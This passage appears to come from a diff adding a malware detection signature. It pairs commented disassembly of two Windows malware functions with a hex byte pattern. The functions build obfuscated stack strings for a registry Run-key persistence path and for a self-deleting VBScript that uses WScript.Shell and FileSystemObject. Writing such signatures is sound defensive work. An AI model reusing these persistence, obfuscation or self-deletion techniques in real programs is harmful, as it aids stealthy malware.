int local21 + .text:0x004056e0 -22: int local22 + .text:0x004056e0 -23: int local23 + .text:0x004056e0 -24: int local24 + .text:0x004056e0 -25: int local25 + .text:0x004056e0 -26: int local26 + .text:0x004056e0 -27: int local27 + .text:0x004056e0 -28: int local28 + .text:0x004056e0 -29: int local29 + .text:0x004056e0 -30: int local30 + .text:0x004056e0 -31: int local31 + .text:0x004056e0 -32: int local32 + .text:0x004056e0 -33: int local33 + .text:0x004056e0 -34: int local34 + .text:0x004056e0 -35: int local35 + .text:0x004056e0 -36: int local36 + .text:0x004056e0 -37: int local37 + .text:0x004056e0 -38: int local38 + .text:0x004056e0 -39: int local39 + .text:0x004056e0 -40: int local40 + .text:0x004056e0 -41: int local41 + .text:0x004056e0 -42: int local42 + .text:0x004056e0 -43: int local43 + .text:0x004056e0 -44: int local44 + .text:0x004056e0 -45: int local45 + .text:0x004056e0 -46: int local46 + .text:0x004056e0 -47: int local47 + .text:0x004056e0 -48: int local48 + .text:0x004056e0 + .text:0x004056e0 83ec30 sub esp,48 + .text:0x004056e3 53 push ebx + .text:0x004056e4 b057 mov al,87 + .text:0x004056e6 56 push esi + .text:0x004056e7 8b742440 mov esi,dword [esp + 64] + .text:0x004056eb b16f mov cl,111 + .text:0x004056ed 8844240c mov byte [esp + 12],al + .text:0x004056f1 8844241b mov byte [esp + 27],al + .text:0x004056f5 b35c mov bl,92 + .text:0x004056f7 b272 mov dl,114 + .text:0x004056f9 884c2415 mov byte [esp + 21],cl + .text:0x004056fd 884c2417 mov byte [esp + 23],cl + .text:0x00405701 b06e mov al,110 + .text:0x00405703 884c241f mov byte [esp + 31],cl + .text:0x00405707 884c242f mov byte [esp + 47],cl + .text:0x0040570b 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00405711 6a00 push 0 + .text:0x00405713 56 push esi + .text:0x00405714 c644241053 mov byte [esp + 16],83 + .text:0x00405719 c64424114f mov byte [esp + 17],79 + .text:0x0040571e c644241246 mov byte [esp + 18],70 + .text:0x00405723 c644241354 mov byte [esp + 19],84 + .text:0x00405728 c644241541 
mov byte [esp + 21],65 + .text:0x0040572d c644241652 mov byte [esp + 22],82 + .text:0x00405732 c644241745 mov byte [esp + 23],69 + .text:0x00405737 885c2418 mov byte [esp + 24],bl + .text:0x0040573b c64424194d mov byte [esp + 25],77 + .text:0x00405740 c644241a69 mov byte [esp + 26],105 + .text:0x00405745 c644241b63 mov byte [esp + 27],99 + .text:0x0040574a 8854241c mov byte [esp + 28],dl + .text:0x0040574e c644241e73 mov byte [esp + 30],115 + .text:0x00405753 c644242066 mov byte [esp + 32],102 + .text:0x00405758 c644242174 mov byte [esp + 33],116 + .text:0x0040575d 885c2422 mov byte [esp + 34],bl + .text:0x00405761 c644242469 mov byte [esp + 36],105 + .text:0x00405766 88442425 mov byte [esp + 37],al + .text:0x0040576a c644242664 mov byte [esp + 38],100 + .text:0x0040576f c644242877 mov byte [esp + 40],119 + .text:0x00405774 c644242973 mov byte [esp + 41],115 + .text:0x00405779 885c242a mov byte [esp + 42],bl + .text:0x0040577d c644242b43 mov byte [esp + 43],67 + .text:0x00405782 c644242c75 mov byte [esp + 44],117 + .text:0x00405787 8854242d mov byte [esp + 45],dl + .text:0x0040578b 8854242e mov byte [esp + 46],dl + .text:0x0040578f c644242f65 mov byte [esp + 47],101 + .text:0x00405794 88442430 mov byte [esp + 48],al + .text:0x00405798 c644243174 mov byte [esp + 49],116 + .text:0x0040579d c644243256 mov byte [esp + 50],86 + .text:0x004057a2 c644243365 mov byte [esp + 51],101 + .text:0x004057a7 88542434 mov byte [esp + 52],dl + .text:0x004057ab c644243573 mov byte [esp + 53],115 + .text:0x004057b0 c644243669 mov byte [esp + 54],105 + .text:0x004057b5 88442438 mov byte [esp + 56],al + .text:0x004057b9 885c2439 mov byte [esp + 57],bl + .text:0x004057bd c644243a52 mov byte [esp + 58],82 + .text:0x004057c2 c644243b75 mov byte [esp + 59],117 + .text:0x004057c7 8844243c mov byte [esp + 60],al + .text:0x004057cb c644243d00 mov byte [esp + 61],0 + .text:0x004057d0 e81befffff call 0x004046f0 ;sub_004046f0(arg1) + .text:0x004057d5 50 push eax + .text:0x004057d6 56 push esi + 
.text:0x004057d7 6a01 push 1 + .text:0x004057d9 8d442418 lea eax,dword [esp + 24] + .text:0x004057dd 68f6a44000 push 0x0040a4f6 + .text:0x004057e2 50 push eax + .text:0x004057e3 6802000080 push 0x80000002 + .text:0x004057e8 e8f3f3ffff call 0x00404be0 ;sub_00404be0(0x80000002,local48,0x0040a4f6,1,arg1,sub_004046f0(arg1),0) + .text:0x004057ed 83c41c add esp,28 + .text:0x004057f0 33c0 xor eax,eax + .text:0x004057f2 5e pop esi + .text:0x004057f3 5b pop ebx + .text:0x004057f4 83c430 add esp,48 + .text:0x004057f7 c3 ret + */ + $c5 = { 83 EC 30 53 B0 57 56 8B 74 24 ?? B1 6F 88 44 24 ?? 88 44 24 ?? B3 5C B2 72 88 4C 24 ?? 88 4C 24 ?? B0 6E 88 4C 24 ?? 88 4C 24 ?? 8B 0D ?? ?? ?? ?? 6A 00 56 C6 44 24 ?? 53 C6 44 24 ?? 4F C6 44 24 ?? 46 C6 44 24 ?? 54 C6 44 24 ?? 41 C6 44 24 ?? 52 C6 44 24 ?? 45 88 5C 24 ?? C6 44 24 ?? 4D C6 44 24 ?? 69 C6 44 24 ?? 63 88 54 24 ?? C6 44 24 ?? 73 C6 44 24 ?? 66 C6 44 24 ?? 74 88 5C 24 ?? C6 44 24 ?? 69 88 44 24 ?? C6 44 24 ?? 64 C6 44 24 ?? 77 C6 44 24 ?? 73 88 5C 24 ?? C6 44 24 ?? 43 C6 44 24 ?? 75 88 54 24 ?? 88 54 24 ?? C6 44 24 ?? 65 88 44 24 ?? C6 44 24 ?? 74 C6 44 24 ?? 56 C6 44 24 ?? 65 88 54 24 ?? C6 44 24 ?? 73 C6 44 24 ?? 69 88 44 24 ?? 88 5C 24 ?? C6 44 24 ?? 52 C6 44 24 ?? 75 88 44 24 ?? C6 44 24 ?? 00 E8 ?? ?? ?? ?? 50 56 6A 01 8D 44 24 ?? 68 F6 A4 40 00 50 68 02 00 00 80 E8 ?? ?? ?? ?? 
83 C4 1C 33 C0 5E 5B 83 C4 30 C3 } + /* +Basic Block at 0x00405920@9324d1a8ae37a36ae560c37448c9705a with 2 features: + - contain obfuscated stackstrings + - create process on Windows + .text:0x00405920 + .text:0x00405920 FUNC: int cdecl sub_00405920( ) [6 XREFS] + .text:0x00405920 + .text:0x00405920 Stack Variables: (offset from initial top of stack) + .text:0x00405920 -499: int local499 + .text:0x00405920 -500: int local500 + .text:0x00405920 -753: int local753 + .text:0x00405920 -755: int local755 + .text:0x00405920 -756: int local756 + .text:0x00405920 -855: int local855 + .text:0x00405920 -856: int local856 + .text:0x00405920 -860: int local860 + .text:0x00405920 -864: int local864 + .text:0x00405920 -865: int local865 + .text:0x00405920 -866: int local866 + .text:0x00405920 -867: int local867 + .text:0x00405920 -868: int local868 + .text:0x00405920 -869: int local869 + .text:0x00405920 -870: int local870 + .text:0x00405920 -871: int local871 + .text:0x00405920 -872: int local872 + .text:0x00405920 -873: int local873 + .text:0x00405920 -874: int local874 + .text:0x00405920 -875: int local875 + .text:0x00405920 -876: int local876 + .text:0x00405920 -877: int local877 + .text:0x00405920 -878: int local878 + .text:0x00405920 -879: int local879 + .text:0x00405920 -880: int local880 + .text:0x00405920 -881: int local881 + .text:0x00405920 -882: int local882 + .text:0x00405920 -883: int local883 + .text:0x00405920 -884: int local884 + .text:0x00405920 -885: int local885 + .text:0x00405920 -886: int local886 + .text:0x00405920 -887: int local887 + .text:0x00405920 -888: int local888 + .text:0x00405920 -889: int local889 + .text:0x00405920 -890: int local890 + .text:0x00405920 -891: int local891 + .text:0x00405920 -892: int local892 + .text:0x00405920 -893: int local893 + .text:0x00405920 -894: int local894 + .text:0x00405920 -895: int local895 + .text:0x00405920 -896: int local896 + .text:0x00405920 -897: int local897 + .text:0x00405920 -898: int local898 + 
.text:0x00405920 -899: int local899 + .text:0x00405920 -900: int local900 + .text:0x00405920 -901: int local901 + .text:0x00405920 -902: int local902 + .text:0x00405920 -903: int local903 + .text:0x00405920 -904: int local904 + .text:0x00405920 -905: int local905 + .text:0x00405920 -906: int local906 + .text:0x00405920 -907: int local907 + .text:0x00405920 -908: int local908 + .text:0x00405920 -909: int local909 + .text:0x00405920 -910: int local910 + .text:0x00405920 -911: int local911 + .text:0x00405920 -912: int local912 + .text:0x00405920 -913: int local913 + .text:0x00405920 -914: int local914 + .text:0x00405920 -915: int local915 + .text:0x00405920 -916: int local916 + .text:0x00405920 -917: int local917 + .text:0x00405920 -918: int local918 + .text:0x00405920 -919: int local919 + .text:0x00405920 -920: int local920 + .text:0x00405920 -921: int local921 + .text:0x00405920 -922: int local922 + .text:0x00405920 -923: int local923 + .text:0x00405920 -924: int local924 + .text:0x00405920 -925: int local925 + .text:0x00405920 -926: int local926 + .text:0x00405920 -927: int local927 + .text:0x00405920 -928: int local928 + .text:0x00405920 -929: int local929 + .text:0x00405920 -930: int local930 + .text:0x00405920 -931: int local931 + .text:0x00405920 -932: int local932 + .text:0x00405920 -933: int local933 + .text:0x00405920 -934: int local934 + .text:0x00405920 -935: int local935 + .text:0x00405920 -936: int local936 + .text:0x00405920 -937: int local937 + .text:0x00405920 -938: int local938 + .text:0x00405920 -939: int local939 + .text:0x00405920 -940: int local940 + .text:0x00405920 -941: int local941 + .text:0x00405920 -942: int local942 + .text:0x00405920 -943: int local943 + .text:0x00405920 -944: int local944 + .text:0x00405920 -945: int local945 + .text:0x00405920 -946: int local946 + .text:0x00405920 -947: int local947 + .text:0x00405920 -948: int local948 + .text:0x00405920 -949: int local949 + .text:0x00405920 -950: int local950 + .text:0x00405920 -951: 
int local951 + .text:0x00405920 -952: int local952 + .text:0x00405920 -953: int local953 + .text:0x00405920 -954: int local954 + .text:0x00405920 -955: int local955 + .text:0x00405920 -956: int local956 + .text:0x00405920 -957: int local957 + .text:0x00405920 -958: int local958 + .text:0x00405920 -959: int local959 + .text:0x00405920 -960: int local960 + .text:0x00405920 -961: int local961 + .text:0x00405920 -962: int local962 + .text:0x00405920 -963: int local963 + .text:0x00405920 -964: int local964 + .text:0x00405920 -965: int local965 + .text:0x00405920 -966: int local966 + .text:0x00405920 -967: int local967 + .text:0x00405920 -968: int local968 + .text:0x00405920 -969: int local969 + .text:0x00405920 -970: int local970 + .text:0x00405920 -971: int local971 + .text:0x00405920 -972: int local972 + .text:0x00405920 -973: int local973 + .text:0x00405920 -974: int local974 + .text:0x00405920 -975: int local975 + .text:0x00405920 -976: int local976 + .text:0x00405920 -977: int local977 + .text:0x00405920 -978: int local978 + .text:0x00405920 -979: int local979 + .text:0x00405920 -980: int local980 + .text:0x00405920 -981: int local981 + .text:0x00405920 -982: int local982 + .text:0x00405920 -983: int local983 + .text:0x00405920 -984: int local984 + .text:0x00405920 -985: int local985 + .text:0x00405920 -986: int local986 + .text:0x00405920 -987: int local987 + .text:0x00405920 -988: int local988 + .text:0x00405920 -989: int local989 + .text:0x00405920 -990: int local990 + .text:0x00405920 -991: int local991 + .text:0x00405920 -992: int local992 + .text:0x00405920 -993: int local993 + .text:0x00405920 -994: int local994 + .text:0x00405920 -995: int local995 + .text:0x00405920 -996: int local996 + .text:0x00405920 -999: int local999 + .text:0x00405920 -1000: int local1000 + .text:0x00405920 -1001: int local1001 + .text:0x00405920 -1002: int local1002 + .text:0x00405920 -1003: int local1003 + .text:0x00405920 -1004: int local1004 + .text:0x00405920 -1005: int 
local1005 + .text:0x00405920 -1006: int local1006 + .text:0x00405920 -1007: int local1007 + .text:0x00405920 -1008: int local1008 + .text:0x00405920 -1009: int local1009 + .text:0x00405920 -1010: int local1010 + .text:0x00405920 -1011: int local1011 + .text:0x00405920 -1012: int local1012 + .text:0x00405920 -1013: int local1013 + .text:0x00405920 -1014: int local1014 + .text:0x00405920 -1015: int local1015 + .text:0x00405920 -1016: int local1016 + .text:0x00405920 -1017: int local1017 + .text:0x00405920 -1018: int local1018 + .text:0x00405920 -1019: int local1019 + .text:0x00405920 -1020: int local1020 + .text:0x00405920 -1021: int local1021 + .text:0x00405920 -1022: int local1022 + .text:0x00405920 -1023: int local1023 + .text:0x00405920 -1024: int local1024 + .text:0x00405920 -1025: int local1025 + .text:0x00405920 -1026: int local1026 + .text:0x00405920 -1027: int local1027 + .text:0x00405920 -1028: int local1028 + .text:0x00405920 -1029: int local1029 + .text:0x00405920 -1030: int local1030 + .text:0x00405920 -1031: int local1031 + .text:0x00405920 -1032: int local1032 + .text:0x00405920 -1033: int local1033 + .text:0x00405920 -1034: int local1034 + .text:0x00405920 -1035: int local1035 + .text:0x00405920 -1036: int local1036 + .text:0x00405920 -1038: int local1038 + .text:0x00405920 -1039: int local1039 + .text:0x00405920 -1040: int local1040 + .text:0x00405920 -1041: int local1041 + .text:0x00405920 -1042: int local1042 + .text:0x00405920 -1043: int local1043 + .text:0x00405920 -1044: int local1044 + .text:0x00405920 -1045: int local1045 + .text:0x00405920 -1046: int local1046 + .text:0x00405920 -1047: int local1047 + .text:0x00405920 -1048: int local1048 + .text:0x00405920 -1049: int local1049 + .text:0x00405920 -1050: int local1050 + .text:0x00405920 -1051: int local1051 + .text:0x00405920 -1052: int local1052 + .text:0x00405920 -1053: int local1053 + .text:0x00405920 -1054: int local1054 + .text:0x00405920 -1055: int local1055 + .text:0x00405920 -1056: int 
local1056 + .text:0x00405920 -1057: int local1057 + .text:0x00405920 -1058: int local1058 + .text:0x00405920 -1059: int local1059 + .text:0x00405920 -1060: int local1060 + .text:0x00405920 -1061: int local1061 + .text:0x00405920 -1062: int local1062 + .text:0x00405920 -1063: int local1063 + .text:0x00405920 -1064: int local1064 + .text:0x00405920 -1065: int local1065 + .text:0x00405920 -1066: int local1066 + .text:0x00405920 -1067: int local1067 + .text:0x00405920 -1068: int local1068 + .text:0x00405920 -1072: int local1072 + .text:0x00405920 -1073: int local1073 + .text:0x00405920 -1074: int local1074 + .text:0x00405920 -1075: int local1075 + .text:0x00405920 -1076: int local1076 + .text:0x00405920 -1077: int local1077 + .text:0x00405920 -1078: int local1078 + .text:0x00405920 -1079: int local1079 + .text:0x00405920 -1080: int local1080 + .text:0x00405920 -1081: int local1081 + .text:0x00405920 -1082: int local1082 + .text:0x00405920 -1083: int local1083 + .text:0x00405920 -1084: int local1084 + .text:0x00405920 -1085: int local1085 + .text:0x00405920 -1086: int local1086 + .text:0x00405920 -1087: int local1087 + .text:0x00405920 -1088: int local1088 + .text:0x00405920 -1089: int local1089 + .text:0x00405920 -1090: int local1090 + .text:0x00405920 -1091: int local1091 + .text:0x00405920 -1092: int local1092 + .text:0x00405920 -1093: int local1093 + .text:0x00405920 -1094: int local1094 + .text:0x00405920 -1095: int local1095 + .text:0x00405920 -1096: int local1096 + .text:0x00405920 -1097: int local1097 + .text:0x00405920 -1098: int local1098 + .text:0x00405920 -1099: int local1099 + .text:0x00405920 -1100: int local1100 + .text:0x00405920 -1101: int local1101 + .text:0x00405920 -1102: int local1102 + .text:0x00405920 -1103: int local1103 + .text:0x00405920 -1104: int local1104 + .text:0x00405920 -1105: int local1105 + .text:0x00405920 -1106: int local1106 + .text:0x00405920 -1107: int local1107 + .text:0x00405920 -1108: int local1108 + .text:0x00405920 -1109: int 
local1109 + .text:0x00405920 -1110: int local1110 + .text:0x00405920 -1111: int local1111 + .text:0x00405920 -1112: int local1112 + .text:0x00405920 -1114: int local1114 + .text:0x00405920 -1115: int local1115 + .text:0x00405920 -1116: int local1116 + .text:0x00405920 -1117: int local1117 + .text:0x00405920 -1118: int local1118 + .text:0x00405920 -1119: int local1119 + .text:0x00405920 -1120: int local1120 + .text:0x00405920 -1121: int local1121 + .text:0x00405920 -1122: int local1122 + .text:0x00405920 -1123: int local1123 + .text:0x00405920 -1124: int local1124 + .text:0x00405920 -1125: int local1125 + .text:0x00405920 -1126: int local1126 + .text:0x00405920 -1127: int local1127 + .text:0x00405920 -1128: int local1128 + .text:0x00405920 -1129: int local1129 + .text:0x00405920 -1130: int local1130 + .text:0x00405920 -1131: int local1131 + .text:0x00405920 -1132: int local1132 + .text:0x00405920 -1136: int local1136 + .text:0x00405920 -1137: int local1137 + .text:0x00405920 -1138: int local1138 + .text:0x00405920 -1139: int local1139 + .text:0x00405920 -1140: int local1140 + .text:0x00405920 -1141: int local1141 + .text:0x00405920 -1142: int local1142 + .text:0x00405920 -1143: int local1143 + .text:0x00405920 -1144: int local1144 + .text:0x00405920 -1148: int local1148 + .text:0x00405920 -1149: int local1149 + .text:0x00405920 -1150: int local1150 + .text:0x00405920 -1151: int local1151 + .text:0x00405920 -1152: int local1152 + .text:0x00405920 -1153: int local1153 + .text:0x00405920 -1154: int local1154 + .text:0x00405920 -1155: int local1155 + .text:0x00405920 -1156: int local1156 + .text:0x00405920 -1157: int local1157 + .text:0x00405920 -1158: int local1158 + .text:0x00405920 -1159: int local1159 + .text:0x00405920 -1160: int local1160 + .text:0x00405920 -1161: int local1161 + .text:0x00405920 -1162: int local1162 + .text:0x00405920 -1163: int local1163 + .text:0x00405920 -1164: int local1164 + .text:0x00405920 -1168: int local1168 + .text:0x00405920 -1169: int 
local1169 + .text:0x00405920 -1170: int local1170 + .text:0x00405920 -1171: int local1171 + .text:0x00405920 -1172: int local1172 + .text:0x00405920 -1436: int local1436 + .text:0x00405920 -1437: int local1437 + .text:0x00405920 -1438: int local1438 + .text:0x00405920 -1439: int local1439 + .text:0x00405920 -1440: int local1440 + .text:0x00405920 -1441: int local1441 + .text:0x00405920 -1442: int local1442 + .text:0x00405920 -1443: int local1443 + .text:0x00405920 -1444: int local1444 + .text:0x00405920 -1445: int local1445 + .text:0x00405920 -1446: int local1446 + .text:0x00405920 -1447: int local1447 + .text:0x00405920 -1448: int local1448 + .text:0x00405920 -1449: int local1449 + .text:0x00405920 -1450: int local1450 + .text:0x00405920 -1451: int local1451 + .text:0x00405920 -1452: int local1452 + .text:0x00405920 -1453: int local1453 + .text:0x00405920 -1454: int local1454 + .text:0x00405920 -1455: int local1455 + .text:0x00405920 -1456: int local1456 + .text:0x00405920 -1460: int local1460 + .text:0x00405920 -1461: int local1461 + .text:0x00405920 -1462: int local1462 + .text:0x00405920 -1463: int local1463 + .text:0x00405920 -1464: int local1464 + .text:0x00405920 -1465: int local1465 + .text:0x00405920 -1466: int local1466 + .text:0x00405920 -1467: int local1467 + .text:0x00405920 -1468: int local1468 + .text:0x00405920 -1469: int local1469 + .text:0x00405920 -1470: int local1470 + .text:0x00405920 -1471: int local1471 + .text:0x00405920 -1472: int local1472 + .text:0x00405920 -1473: int local1473 + .text:0x00405920 -1474: int local1474 + .text:0x00405920 -1475: int local1475 + .text:0x00405920 -1476: int local1476 + .text:0x00405920 -1477: int local1477 + .text:0x00405920 -1478: int local1478 + .text:0x00405920 -1479: int local1479 + .text:0x00405920 -1480: int local1480 + .text:0x00405920 -1481: int local1481 + .text:0x00405920 -1482: int local1482 + .text:0x00405920 -1483: int local1483 + .text:0x00405920 -1484: int local1484 + .text:0x00405920 + 
.text:0x00405920 81ec94040000 sub esp,1172 + .text:0x00405926 53 push ebx + .text:0x00405927 56 push esi + .text:0x00405928 57 push edi + .text:0x00405929 b918000000 mov ecx,24 + .text:0x0040592e 33c0 xor eax,eax + .text:0x00405930 8dbc2449010000 lea edi,dword [esp + 329] + .text:0x00405937 c684244801000000 mov byte [esp + 328],0 + .text:0x0040593f c68424ac02000000 mov byte [esp + 684],0 + .text:0x00405947 f3ab rep: stosd + .text:0x00405949 66ab stosd + .text:0x0040594b aa stosb + .text:0x0040594c b97c000000 mov ecx,124 + .text:0x00405951 33c0 xor eax,eax + .text:0x00405953 8dbc24ad020000 lea edi,dword [esp + 685] + .text:0x0040595a c68424ac01000000 mov byte [esp + 428],0 + .text:0x00405962 f3ab rep: stosd + .text:0x00405964 66ab stosd + .text:0x00405966 aa stosb + .text:0x00405967 b93f000000 mov ecx,63 + .text:0x0040596c 33c0 xor eax,eax + .text:0x0040596e 8dbc24ad010000 lea edi,dword [esp + 429] + .text:0x00405975 b272 mov dl,114 + .text:0x00405977 f3ab rep: stosd + .text:0x00405979 66ab stosd + .text:0x0040597b aa stosb + .text:0x0040597c b365 mov bl,101 + .text:0x0040597e b074 mov al,116 + .text:0x00405980 b163 mov cl,99 + .text:0x00405982 c644241464 mov byte [esp + 20],100 + .text:0x00405987 c644241569 mov byte [esp + 21],105 + .text:0x0040598c c64424166d mov byte [esp + 22],109 + .text:0x00405991 c644241720 mov byte [esp + 23],32 + .text:0x00405996 c644241877 mov byte [esp + 24],119 + .text:0x0040599b c644241973 mov byte [esp + 25],115 + .text:0x004059a0 c644241a68 mov byte [esp + 26],104 + .text:0x004059a5 c644241b00 mov byte [esp + 27],0 + .text:0x004059aa c644245c4f mov byte [esp + 92],79 + .text:0x004059af c644245d6e mov byte [esp + 93],110 + .text:0x004059b4 c644245e20 mov byte [esp + 94],32 + .text:0x004059b9 c644245f45 mov byte [esp + 95],69 + .text:0x004059be 88542460 mov byte [esp + 96],dl + .text:0x004059c2 88542461 mov byte [esp + 97],dl + .text:0x004059c6 c64424626f mov byte [esp + 98],111 + .text:0x004059cb 88542463 mov byte [esp + 99],dl + 
.text:0x004059cf c644246420 mov byte [esp + 100],32 + .text:0x004059d4 c644246552 mov byte [esp + 101],82 + .text:0x004059d9 885c2466 mov byte [esp + 102],bl + .text:0x004059dd c644246773 mov byte [esp + 103],115 + .text:0x004059e2 c644246875 mov byte [esp + 104],117 + .text:0x004059e7 c64424696d mov byte [esp + 105],109 + .text:0x004059ec 885c246a mov byte [esp + 106],bl + .text:0x004059f0 c644246b20 mov byte [esp + 107],32 + .text:0x004059f5 c644246c4e mov byte [esp + 108],78 + .text:0x004059fa 885c246d mov byte [esp + 109],bl + .text:0x004059fe c644246e78 mov byte [esp + 110],120 + .text:0x00405a03 8844246f mov byte [esp + 111],al + .text:0x00405a07 c644247000 mov byte [esp + 112],0 + .text:0x00405a0c c684249400000073 mov byte [esp + 148],115 + .text:0x00405a14 889c2495000000 mov byte [esp + 149],bl + .text:0x00405a1b 88842496000000 mov byte [esp + 150],al + .text:0x00405a22 c684249700000020 mov byte [esp + 151],32 + .text:0x00405a2a c684249800000077 mov byte [esp + 152],119 + .text:0x00405a32 c684249900000073 mov byte [esp + 153],115 + .text:0x00405a3a c684249a00000068 mov byte [esp + 154],104 + .text:0x00405a42 c684249b0000003d mov byte [esp + 155],61 + .text:0x00405a4a 888c249c000000 mov byte [esp + 156],cl + .text:0x00405a51 8894249d000000 mov byte [esp + 157],dl + .text:0x00405a58 889c249e000000 mov byte [esp + 158],bl + .text:0x00405a5f c684249f00000061 mov byte [esp + 159],97 + .text:0x00405a67 888424a0000000 mov byte [esp + 160],al + .text:0x00405a6e 889c24a1000000 mov byte [esp + 161],bl + .text:0x00405a75 c68424a20000004f mov byte [esp + 162],79 + .text:0x00405a7d c68424a300000062 mov byte [esp + 163],98 + .text:0x00405a85 c68424a40000006a mov byte [esp + 164],106 + .text:0x00405a8d 889c24a5000000 mov byte [esp + 165],bl + .text:0x00405a94 888c24a6000000 mov byte [esp + 166],cl + .text:0x00405a9b 888424a7000000 mov byte [esp + 167],al + .text:0x00405aa2 c68424a800000028 mov byte [esp + 168],40 + .text:0x00405aaa c68424a900000022 mov byte [esp + 169],34 
+ .text:0x00405ab2 c68424aa00000057 mov byte [esp + 170],87 + .text:0x00405aba c68424ab00000053 mov byte [esp + 171],83 + .text:0x00405ac2 888c24ac000000 mov byte [esp + 172],cl + .text:0x00405ac9 889424ad000000 mov byte [esp + 173],dl + .text:0x00405ad0 c68424ae00000069 mov byte [esp + 174],105 + .text:0x00405ad8 c68424af00000070 mov byte [esp + 175],112 + .text:0x00405ae0 888424b0000000 mov byte [esp + 176],al + .text:0x00405ae7 c68424b10000002e mov byte [esp + 177],46 + .text:0x00405aef c68424b200000053 mov byte [esp + 178],83 + .text:0x00405af7 c68424b300000068 mov byte [esp + 179],104 + .text:0x00405aff 889c24b4000000 mov byte [esp + 180],bl + .text:0x00405b06 c68424b50000006c mov byte [esp + 181],108 + .text:0x00405b0e c68424b60000006c mov byte [esp + 182],108 + .text:0x00405b16 c68424b700000022 mov byte [esp + 183],34 + .text:0x00405b1e c68424b800000029 mov byte [esp + 184],41 + .text:0x00405b26 c68424b900000000 mov byte [esp + 185],0 + .text:0x00405b2e c68424bc00000053 mov byte [esp + 188],83 + .text:0x00405b36 889c24bd000000 mov byte [esp + 189],bl + .text:0x00405b3d 888424be000000 mov byte [esp + 190],al + .text:0x00405b44 c68424bf00000020 mov byte [esp + 191],32 + .text:0x00405b4c c68424c00000006f mov byte [esp + 192],111 + .text:0x00405b54 c68424c100000062 mov byte [esp + 193],98 + .text:0x00405b5c c68424c20000006a mov byte [esp + 194],106 + .text:0x00405b64 c68424c300000046 mov byte [esp + 195],70 + .text:0x00405b6c c68424c400000053 mov byte [esp + 196],83 + .text:0x00405b74 c68424c50000004f mov byte [esp + 197],79 + .text:0x00405b7c c68424c600000020 mov byte [esp + 198],32 + .text:0x00405b84 c68424c70000003d mov byte [esp + 199],61 + .text:0x00405b8c c68424c800000020 mov byte [esp + 200],32 + .text:0x00405b94 c68424c900000043 mov byte [esp + 201],67 + .text:0x00405b9c 889424ca000000 mov byte [esp + 202],dl + .text:0x00405ba3 889c24cb000000 mov byte [esp + 203],bl + .text:0x00405baa c68424cc00000061 mov byte [esp + 204],97 + .text:0x00405bb2 
888424cd000000 mov byte [esp + 205],al + .text:0x00405bb9 889c24ce000000 mov byte [esp + 206],bl + .text:0x00405bc0 c68424cf0000004f mov byte [esp + 207],79 + .text:0x00405bc8 c68424d000000062 mov byte [esp + 208],98 + .text:0x00405bd0 c68424d10000006a mov byte [esp + 209],106 + .text:0x00405bd8 889c24d2000000 mov byte [esp + 210],bl + .text:0x00405bdf 888c24d3000000 mov byte [esp + 211],cl + .text:0x00405be6 888424d4000000 mov byte [esp + 212],al + .text:0x00405bed c68424d500000028 mov byte [esp + 213],40 + .text:0x00405bf5 c68424d600000022 mov byte [esp + 214],34 + .text:0x00405bfd c68424d700000053 mov byte [esp + 215],83 + .text:0x00405c05 888c24d8000000 mov byte [esp + 216],cl + .text:0x00405c0c 889424d9000000 mov byte [esp + 217],dl + .text:0x00405c13 c68424da00000069 mov byte [esp + 218],105 + .text:0x00405c1b c68424db00000070 mov byte [esp + 219],112 + .text:0x00405c23 888424dc000000 mov byte [esp + 220],al + .text:0x00405c2a c68424dd00000069 mov byte [esp + 221],105 + .text:0x00405c32 c68424de0000006e mov byte [esp + 222],110 + .text:0x00405c3a c68424df00000067 mov byte [esp + 223],103 + .text:0x00405c42 c68424e00000002e mov byte [esp + 224],46 + .text:0x00405c4a c68424e100000046 mov byte [esp + 225],70 + .text:0x00405c52 c68424e200000069 mov byte [esp + 226],105 + .text:0x00405c5a c68424e30000006c mov byte [esp + 227],108 + .text:0x00405c62 889c24e4000000 mov byte [esp + 228],bl + .text:0x00405c69 c68424e500000053 mov byte [esp + 229],83 + .text:0x00405c71 c68424e600000079 mov byte [esp + 230],121 + .text:0x00405c79 c68424e700000073 mov byte [esp + 231],115 + .text:0x00405c81 888424e8000000 mov byte [esp + 232],al + .text:0x00405c88 889c24e9000000 mov byte [esp + 233],bl + .text:0x00405c8f c68424ea0000006d mov byte [esp + 234],109 + .text:0x00405c97 c68424eb0000004f mov byte [esp + 235],79 + .text:0x00405c9f c68424ec00000062 mov byte [esp + 236],98 + .text:0x00405ca7 c68424ed0000006a mov byte [esp + 237],106 + .text:0x00405caf 889c24ee000000 mov byte [esp 
+ 238],bl + .text:0x00405cb6 888c24ef000000 mov byte [esp + 239],cl + .text:0x00405cbd 888424f0000000 mov byte [esp + 240],al + .text:0x00405cc4 c68424f100000022 mov byte [esp + 241],34 + .text:0x00405ccc c68424f200000029 mov byte [esp + 242],41 + .text:0x00405cd4 c68424f300000000 mov byte [esp + 243],0 + .text:0x00405cdc c644243477 mov byte [esp + 52],119 + .text:0x00405ce1 c644243573 mov byte [esp + 53],115 + .text:0x00405ce6 884c2436 mov byte [esp + 54],cl + .text:0x00405cea 88542437 mov byte [esp + 55],dl + .text:0x00405cee c644243869 mov byte [esp + 56],105 + .text:0x00405cf3 c644243970 mov byte [esp + 57],112 + .text:0x00405cf8 8844243a mov byte [esp + 58],al + .text:0x00405cfc c644243b2e mov byte [esp + 59],46 + .text:0x00405d01 c644243c73 mov byte [esp + 60],115 + .text:0x00405d06 c644243d6c mov byte [esp + 61],108 + .text:0x00405d0b 885c243e mov byte [esp + 62],bl + .text:0x00405d0f 885c243f mov byte [esp + 63],bl + .text:0x00405d13 c644244070 mov byte [esp + 64],112 + .text:0x00405d18 c644244120 mov byte [esp + 65],32 + .text:0x00405d1d c644244231 mov byte [esp + 66],49 + .text:0x00405d22 c644244330 mov byte [esp + 67],48 + .text:0x00405d27 c644244430 mov byte [esp + 68],48 + .text:0x00405d2c c644244530 mov byte [esp + 69],48 + .text:0x00405d31 c644244600 mov byte [esp + 70],0 + .text:0x00405d36 c64424486f mov byte [esp + 72],111 + .text:0x00405d3b c644244962 mov byte [esp + 73],98 + .text:0x00405d40 c644244a6a mov byte [esp + 74],106 + .text:0x00405d45 c644244b46 mov byte [esp + 75],70 + .text:0x00405d4a c644244c53 mov byte [esp + 76],83 + .text:0x00405d4f c644244d4f mov byte [esp + 77],79 + .text:0x00405d54 c644244e2e mov byte [esp + 78],46 + .text:0x00405d59 c644244f44 mov byte [esp + 79],68 + .text:0x00405d5e 885c2450 mov byte [esp + 80],bl + .text:0x00405d62 c64424516c mov byte [esp + 81],108 + .text:0x00405d67 